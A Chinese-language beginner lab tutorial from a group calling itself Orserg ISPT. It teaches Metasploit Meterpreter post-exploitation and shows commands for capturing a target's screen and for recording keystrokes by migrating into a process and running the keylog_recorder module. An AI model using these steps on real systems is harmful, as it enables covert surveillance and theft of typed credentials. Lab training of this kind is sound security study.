Orserg ISPT 内网安全项目组A6-4 Or A6-6项目训练文档
Orserg 内网安全项目组官方基础训练文档 (A-6项目)
你好安全人员!我是Orserg一个高性能可开放托管组织,专针对初学安全人员提供最为简单并且完全免费的文档资料。很高兴认识你并且能让你从中学习到一些东西。如果你希望加入Orserg学到更多东西请在****上搜索Orserg关注并且私信我们,我们会在第一时间接收到并且联系你。
Orserg ISPT :
Hello!内网安全实验人员。我是Orserg内网安全项目组简称ISPT,针对学习内网安全的初级A类研究人员提供较为简单的实验项目。在这2个月内你将学会并使用Metasploit的多种基础攻击技能。如信息收集、漏洞扫描、渗透攻击、免杀编码、社会工程、SQL方面攻击、和自己定制属于自己的metasploit个性化武器。
实验环境:
该文件的所有实验只适用于内网安全,并且所有环境均为自己搭建,包括特殊系统镜像,渗透工具、或者是虚拟机等,请确保你有搭建实验平台的条件,才能顺利完成安全实验。Orserg ISPT在模拟环境方面可能会用到Windows Server服务器或服务器搭建等多种企业环境模拟技术这些技术都会展现在内网实验环境搭建 中。
A-6-4 Meterpreter Shell 截取实时屏幕
该方法可以判断目标主机系统在干什么或者安装了什么杀毒软件
(1)Meterpreter>screenshot
(2)点开该图片便可查看
A-6-5 系统架构查询
该方法主要用于查询目标系统的架构和详细版本信息,以便更了解系统是否还有其他漏洞。
A-6-6 键盘记录
该方法主要用于记录目标正在实时输入的数据
(1)显示目标系统运行进程列表
Meterpreter>ps
(2)监听指定进程
Meterpreter>migrate 指定进程PID
(3)启用键盘记录模块
Meterpreter>run post/windows/capture/keylog_recorder
(4)Ctrl+C 停止监听记录
(5)自动保存到指定目录,等待保存时间。
(6) 重新打开一个终端,使用cd 定位到存放目录
(7)使用vi命令打开该文件
便可查看目标系统在进程中输入了什么数据。
(8)现在我们来看看WIN7目标系统那边的情况